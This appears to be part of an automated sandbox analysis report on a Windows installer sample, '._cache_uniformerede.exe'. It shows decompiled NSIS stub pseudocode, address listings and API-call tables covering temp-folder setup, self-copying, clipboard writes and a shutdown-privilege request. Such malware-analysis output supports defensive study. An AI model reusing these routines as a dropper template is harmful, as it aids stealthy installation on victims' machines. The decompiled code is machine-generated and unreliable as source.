                                                                                                                                                                                                                            												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t222);
                                                                                                                                                                                                                            												E00406668(L"C:\\Users\\hardz\\AppData\\Local\\Temp", _t222);
                                                                                                                                                                                                                            												_v8 = _t189;
                                                                                                                                                                                                                            												goto L51;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											asm("cdq");
                                                                                                                                                                                                                            											_t205 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                                                                                                                            											_t168 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                                                                                                                                                            											while( *_t219 != _t205 || _t219[1] != _t168) {
                                                                                                                                                                                                                            												_t219 = _t219;
                                                                                                                                                                                                                            												if(_t219 >= L"\"C:\\Users\\hardz\\Desktop\\._cache_uniformerede.exe\" ") {
                                                                                                                                                                                                                            													continue;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            											_t189 = 0;
                                                                                                                                                                                                                            											goto L48;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										GetWindowsDirectoryW(_t235, 0x3fb);
                                                                                                                                                                                                                            										lstrcatW(_t235, L"\\Temp");
                                                                                                                                                                                                                            										_t171 = E0040360F(_t199, _t253);
                                                                                                                                                                                                                            										_t254 = _t171;
                                                                                                                                                                                                                            										if(_t171 != 0) {
                                                                                                                                                                                                                            											goto L40;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										GetTempPathW(0x3fc, _t235);
                                                                                                                                                                                                                            										lstrcatW(_t235, L"Low");
                                                                                                                                                                                                                            										SetEnvironmentVariableW(L"TEMP", _t235);
                                                                                                                                                                                                                            										SetEnvironmentVariableW(L"TMP", _t235);
                                                                                                                                                                                                                            										_t176 = E0040360F(_t199, _t254);
                                                                                                                                                                                                                            										_t255 = _t176;
                                                                                                                                                                                                                            										if(_t176 == 0) {
                                                                                                                                                                                                                            											goto L68;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L31;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                                                                                                                                                                                                                            								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                                                                                                                                                                                                                            									goto L29;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t178 =  *((intOrPtr*)(_t199 + 8));
                                                                                                                                                                                                                            								__eflags = _t178 - 0x20;
                                                                                                                                                                                                                            								if(_t178 == 0x20) {
                                                                                                                                                                                                                            									L28:
                                                                                                                                                                                                                            									_t36 =  &_v20;
                                                                                                                                                                                                                            									 *_t36 = _v20 | 0x00000004;
                                                                                                                                                                                                                            									__eflags =  *_t36;
                                                                                                                                                                                                                            									goto L29;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _t178 - _t189;
                                                                                                                                                                                                                            								if(_t178 != _t189) {
                                                                                                                                                                                                                            									goto L29;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t179 =  *((intOrPtr*)(_t199 + 2));
                                                                                                                                                                                                                            							__eflags = _t179 - _t210;
                                                                                                                                                                                                                            							if(_t179 == _t210) {
                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                            								 *0x42a300 = 1;
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eflags = _t179 - _t189;
                                                                                                                                                                                                                            							if(_t179 != _t189) {
                                                                                                                                                                                                                            								goto L24;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                            						_t199 = _t199 + 2;
                                                                                                                                                                                                                            						__eflags =  *_t199 - _t210;
                                                                                                                                                                                                                            					} while ( *_t199 == _t210);
                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L37;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x00403b6c
                                                                                                                                                                                                                            0x00403b71
                                                                                                                                                                                                                            0x00403b7a
                                                                                                                                                                                                                            0x00403b97
                                                                                                                                                                                                                            0x00403c0f
                                                                                                                                                                                                                            0x00403c0f
                                                                                                                                                                                                                            0x00403c17
                                                                                                                                                                                                                            0x00403c19
                                                                                                                                                                                                                            0x00403c19
                                                                                                                                                                                                                            0x00403c1f
                                                                                                                                                                                                                            0x00403c1f
                                                                                                                                                                                                                            0x00403bae
                                                                                                                                                                                                                            0x00403bba
                                                                                                                                                                                                                            0x00403bcb
                                                                                                                                                                                                                            0x00403bd2
                                                                                                                                                                                                                            0x00403bd9
                                                                                                                                                                                                                            0x00403bd9
                                                                                                                                                                                                                            0x00403be1
                                                                                                                                                                                                                            0x00403bed
                                                                                                                                                                                                                            0x00403bfb
                                                                                                                                                                                                                            0x00403c06
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                                                            0x00403bef
                                                                                                                                                                                                                            0x00403bf0
                                                                                                                                                                                                                            0x00403bf2
                                                                                                                                                                                                                            0x00403bf3
                                                                                                                                                                                                                            0x00403bf4
                                                                                                                                                                                                                            0x00403bf9
                                                                                                                                                                                                                            0x00403c08
                                                                                                                                                                                                                            0x00403c0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403c0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403bf9
                                                                                                                                                                                                                            0x00403bed
                                                                                                                                                                                                                            0x00403b84
                                                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                                                            0x00403b8b
                                                                                                                                                                                                                            0x004039a1
                                                                                                                                                                                                                            0x00403a48
                                                                                                                                                                                                                            0x00403a48
                                                                                                                                                                                                                            0x00403a54
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a54
                                                                                                                                                                                                                            0x004039b2
                                                                                                                                                                                                                            0x004039ba
                                                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                                                            0x00403a0c
                                                                                                                                                                                                                            0x00403a12
                                                                                                                                                                                                                            0x00403a19
                                                                                                                                                                                                                            0x00403a67
                                                                                                                                                                                                                            0x00403a69
                                                                                                                                                                                                                            0x00403a6e
                                                                                                                                                                                                                            0x00403a70
                                                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                                                            0x00403a78
                                                                                                                                                                                                                            0x00403a83
                                                                                                                                                                                                                            0x00403a88
                                                                                                                                                                                                                            0x00403a8f
                                                                                                                                                                                                                            0x00403a95
                                                                                                                                                                                                                            0x00403a97
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00403b6a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403a9d
                                                                                                                                                                                                                            0x00403a9d
                                                                                                                                                                                                                            0x00403a9f
                                                                                                                                                                                                                            0x00403aa0
                                                                                                                                                                                                                            0x00403aa9
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aa2
                                                                                                                                                                                                                            0x00403aaf
                                                                                                                                                                                                                            0x00403ab7
                                                                                                                                                                                                                            0x00403abe
                                                                                                                                                                                                                            0x00403ac6
                                                                                                                                                                                                                            0x00403ac6
                                                                                                                                                                                                                            0x00403ad3
                                                                                                                                                                                                                            0x00403adf
                                                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                                                            0x00403ae9
                                                                                                                                                                                                                            0x00403aeb
                                                                                                                                                                                                                            0x00403af2
                                                                                                                                                                                                                            0x00403afc
                                                                                                                                                                                                                            0x00403b08
                                                                                                                                                                                                                            0x00403b0e
                                                                                                                                                                                                                            0x00403b14
                                                                                                                                                                                                                            0x00403b17
                                                                                                                                                                                                                            0x00403b21
                                                                                                                                                                                                                            0x00403b27
                                                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                                                            0x00403b2d
                                                                                                                                                                                                                            0x00403b3e
                                                                                                                                                                                                                            0x00403b44
                                                                                                                                                                                                                            0x00403b49
                                                                                                                                                                                                                            0x00403b4b
                                                                                                                                                                                                                            0x00403b4e
                                                                                                                                                                                                                            0x00403b54
                                                                                                                                                                                                                            0x00403b54
                                                                                                                                                                                                                            0x00403b4b
                                                                                                                                                                                                                            0x00403b29
                                                                                                                                                                                                                            0x00403b57
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b5e
                                                                                                                                                                                                                            0x00403b65
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403b65
                                                                                                                                                                                                                            0x00403a97
                                                                                                                                                                                                                            0x00403a1b
                                                                                                                                                                                                                            0x00403a1e
                                                                                                                                                                                                                            0x00403a22
                                                                                                                                                                                                                            0x00403a27
                                                                                                                                                                                                                            0x00403a29
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403663
• GetVersionExW.KERNEL32(?), ref: 0040368C
• GetVersionExW.KERNEL32(0000011C), ref: 004036A3
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
• #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
• OleInitialize.OLE32(00000000), ref: 0040377D
• SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
• GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
• CharNextW.USER32(00000000,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000020,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000000), ref: 004037E9
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
• DeleteFileW.KERNELBASE(1033), ref: 00403982
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
  • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\._cache_uniformerede.exe" ,00000000,?), ref: 00403A8F
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
• DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
• CopyFileW.KERNEL32(C:\Users\user\Desktop\._cache_uniformerede.exe,00420F08,00000001), ref: 00403B21
• CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
• OleUninitialize.OLE32(?), ref: 00403B71
• ExitProcess.KERNEL32 ref: 00403B8B
• GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
• OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
• ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\._cache_uniformerede.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\._cache_uniformerede.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            (Graph of function 00405809; legend: Executed, Not Executed)
                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                            			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                                                                                                                                            				struct HWND__* _v8;
                                                                                                                                                                                                                            				long _v12;
                                                                                                                                                                                                                            				struct tagRECT _v28;
                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                                                                            				int _v44;
                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                                                                            				int _v56;
                                                                                                                                                                                                                            				void* _v60;
                                                                                                                                                                                                                            				void* _v68;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				struct HWND__* _t94;
                                                                                                                                                                                                                            				long _t95;
                                                                                                                                                                                                                            				int _t100;
                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                            				struct HWND__* _t134;
                                                                                                                                                                                                                            				int _t156;
                                                                                                                                                                                                                            				int _t159;
                                                                                                                                                                                                                            				struct HMENU__* _t164;
                                                                                                                                                                                                                            				struct HWND__* _t168;
                                                                                                                                                                                                                            				struct HWND__* _t169;
                                                                                                                                                                                                                            				int _t171;
                                                                                                                                                                                                                            				void* _t172;
                                                                                                                                                                                                                            				short* _t173;
                                                                                                                                                                                                                            				short* _t175;
                                                                                                                                                                                                                            				int _t177;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t169 =  *0x429244;
                                                                                                                                                                                                                            				_t156 = 0;
                                                                                                                                                                                                                            				_v8 = _t169;
                                                                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                                                                            					if(_a8 == 0x405) {
                                                                                                                                                                                                                            						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                                                                                                                                            						FindCloseChangeNotification(_t127); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                            						_t171 = 1;
                                                                                                                                                                                                                            						if(_a8 != 0x404) {
                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                            							if(_a8 != 0x7b) {
                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t94 = _v8;
                                                                                                                                                                                                                            							if(_a12 != _t94) {
                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                                                                                                                                            							_a8 = _t95;
                                                                                                                                                                                                                            							if(_t95 <= _t156) {
                                                                                                                                                                                                                            								L36:
                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t164 = CreatePopupMenu();
                                                                                                                                                                                                                            							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                                                                                                                                            							_t100 = _a16;
                                                                                                                                                                                                                            							_t159 = _a16 >> 0x10;
                                                                                                                                                                                                                            							if(_a16 == 0xffffffff) {
                                                                                                                                                                                                                            								GetWindowRect(_v8,  &_v28);
                                                                                                                                                                                                                            								_t100 = _v28.left;
                                                                                                                                                                                                                            								_t159 = _v28.top;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                                                                                                                                                            								_v60 = _t156;
                                                                                                                                                                                                                            								_v48 = 0x423748;
                                                                                                                                                                                                                            								_v44 = 0x1000;
                                                                                                                                                                                                                            								_a4 = _a8;
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									_a4 = _a4 - 1;
                                                                                                                                                                                                                            									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                                                                                                                                                            								} while (_a4 != _t156);
                                                                                                                                                                                                                            								OpenClipboard(_t156);
                                                                                                                                                                                                                            								EmptyClipboard();
                                                                                                                                                                                                                            								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                                                                                                                                            								_a4 = _t108;
                                                                                                                                                                                                                            								_t172 = GlobalLock(_t108);
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									_v48 = _t172;
                                                                                                                                                                                                                            									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                                                                                                                                            									 *_t173 = 0xd;
                                                                                                                                                                                                                            									_t175 = _t173 + 2;
                                                                                                                                                                                                                            									 *_t175 = 0xa;
                                                                                                                                                                                                                            									_t172 = _t175 + 2;
                                                                                                                                                                                                                            									_t156 = _t156 + 1;
                                                                                                                                                                                                                            								} while (_t156 < _a8);
                                                                                                                                                                                                                            								GlobalUnlock(_a4);
                                                                                                                                                                                                                            								SetClipboardData(0xd, _a4);
                                                                                                                                                                                                                            								CloseClipboard();
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L36;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *0x42922c == _t156) {
                                                                                                                                                                                                                            							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								_t119 =  *0x422720; // 0x68b77c
								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}



































                                                                                                                                                                                                                            0x00405a02
                                                                                                                                                                                                                            0x00405a07
                                                                                                                                                                                                                            0x00405a0a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405a0a
                                                                                                                                                                                                                            0x004059f1
                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                            0x0040582e
                                                                                                                                                                                                                            0x00405836
                                                                                                                                                                                                                            0x0040583a
                                                                                                                                                                                                                            0x0040583d
                                                                                                                                                                                                                            0x00405840
                                                                                                                                                                                                                            0x00405843
                                                                                                                                                                                                                            0x00405846
                                                                                                                                                                                                                            0x00405847
                                                                                                                                                                                                                            0x00405848
                                                                                                                                                                                                                            0x00405861
                                                                                                                                                                                                                            0x00405864
                                                                                                                                                                                                                            0x0040586e
                                                                                                                                                                                                                            0x0040587d
                                                                                                                                                                                                                            0x00405885
                                                                                                                                                                                                                            0x0040588d
                                                                                                                                                                                                                            0x00405892
                                                                                                                                                                                                                            0x00405895
                                                                                                                                                                                                                            0x004058a1
                                                                                                                                                                                                                            0x004058aa
                                                                                                                                                                                                                            0x004058b3
                                                                                                                                                                                                                            0x004058d5
                                                                                                                                                                                                                            0x004058db
                                                                                                                                                                                                                            0x004058ec
                                                                                                                                                                                                                            0x004058f1
                                                                                                                                                                                                                            0x004058ff
                                                                                                                                                                                                                            0x0040590d
                                                                                                                                                                                                                            0x0040590d
                                                                                                                                                                                                                            0x00405912
                                                                                                                                                                                                                            0x00405920
                                                                                                                                                                                                                            0x00405920
                                                                                                                                                                                                                            0x00405925
                                                                                                                                                                                                                            0x00405928
                                                                                                                                                                                                                            0x0040592d
                                                                                                                                                                                                                            0x00405939
                                                                                                                                                                                                                            0x00405942
                                                                                                                                                                                                                            0x0040594f
                                                                                                                                                                                                                            0x0040595e
                                                                                                                                                                                                                            0x00405951
                                                                                                                                                                                                                            0x00405956
                                                                                                                                                                                                                            0x00405956
                                                                                                                                                                                                                            0x0040596a
                                                                                                                                                                                                                            0x0040596a
                                                                                                                                                                                                                            0x0040597e
                                                                                                                                                                                                                            0x00405987
                                                                                                                                                                                                                            0x00405990
                                                                                                                                                                                                                            0x004059a0
                                                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                                                            0x004059ac
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405867
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405876
                                                                                                                                                                                                                            • GetClientRect.USER32 ref: 004058B3
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004058BA
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405956
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405977
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405885
                                                                                                                                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 004059C9
                                                                                                                                                                                                                            • CreateThread.KERNELBASE ref: 004059D7
                                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004059DE
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405A02
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 00405A51
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 00405A96
                                                                                                                                                                                                                            • AppendMenuW.USER32 ref: 00405AAA
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00405ACA
                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 00405B31
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 00405B47
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00405B8C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
